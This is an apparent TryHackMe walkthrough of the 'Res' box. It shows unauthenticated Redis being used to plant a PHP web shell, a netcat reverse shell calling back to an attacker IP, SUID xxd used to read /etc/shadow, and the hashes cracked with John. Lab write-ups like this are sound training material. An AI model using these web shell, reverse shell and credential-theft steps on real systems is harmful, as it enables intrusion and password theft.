Res Walkthrough — TryHackMe

Box Name: Res

IP: 10.10.104.100

Reconnaissance

First and most, scan the IP completely.

nmap -A -p- -Pn -oN nmapFULL 10.10.104.100

• -A: Enable OS detection, version detection, script scanning, and traceroute
• -Pn : Treat all hosts as online — skip host discovery
• -p- : Scan all ports(65,535)
• -oN : Output scan in normal format

Nmap

Only 2 ports are open [ 80 and 6379 ]

80 is having apache default page

Redis is running on 6379

Enumeration

I ran dirb and gobuster on the web page but haven't found anything interesting. So the next option is Redis Server which is running on 6379.

For connecting Redis server we need to install it on our machine.

sudo apt-get install redis-tools

We can connect to a Redis server with and without a password.

Syntax with Password
redis-cli -h $ip_address -p $password
Synatx without Without Password
redis-cli -h $ip_address

In our case, unauthorized access is available [ without a password. ]

redis-cli -h 10.10.104.100

Connected to Redis

Since Redis is much restricted, we need a reverse shell to move on. After a bit of googling found a nice article on that https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#redis-rce.

It actually pointed to Nginx [ /usr/share/nginx/html ]but we were running apache[ /var/www/html ], so made some modification.

Sample PHP code

Now we can check whether it is loaded or not, for that browse to we can 10.10.44.110/trail.php

Sample Page

Now we will make a PHP command injection. Either you can overwrite the old trail.php or can create a new PHP file. I have created a new one named rev.php

Exploitation

PHP Command Injection Payload

"<?php system($_GET['cmd']); ?>"

Command Injection PHP code

Lets access http://10.10.104.100/shell.php?cmd=whoami

10.10.104.100/shell.php?cmd=whoami

Now we need a reverse shell, I’m using nc one liner for that.

Syntax :
nc -e /bin/bash $attackerIP $attackerPort
Example:
nc -w /bin/bash 10.9.62.7 1337 

10.10.104/rev.php?cmd=nc -e /bin/bash 10.9.62.7 1337

Non-Interactive Shell to Interactive Shell:

python -c ‘import pty;pty.spawn(“/bin/bash”)’

Cntrl +z

stty raw -echo

fg [ Click “Enter “ twice” ]

export TERM=xterm

Privilege Escalation

We can search for programs with SUID permission

find / -perm -u=s -type f 2>/dev/null

The results show a binary xxd with the SUID bit set and the owner is root. We can check for exploitation. For SUID/SUDO privilege escalation GTFOBins is perfect.

From Dtfobins we found that we can read a file with xxd, we will e read /etc/shadow.

LFILE=/etc/shadow
xxd "$LFILE" | xxd -r

/etc/shadow

Copy and Save the content to our machine [ shadow.txt ]

We need /etc/passwd as well for cracking the password[ passwd.txt ]

/etc/passwd

Brute Forcing Hash with John:

unshadow passwd.txt shadow.txt > unshadow.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadow.txt
john --show unshadow.txt

Cracked Password

Now we can switch user to Vinaka with su command.

www-data@ubuntu:/$ su - vinaka
vianka@ubunru:~$ sudo -l
vianka@ubunru:~$ sudo -i
root@ubuntu:~#

Runing ‘sudo -l’, we can see that vianka has full access .To escalate to root all we need to do is run ‘sudo -i ’

Root!

FLAGS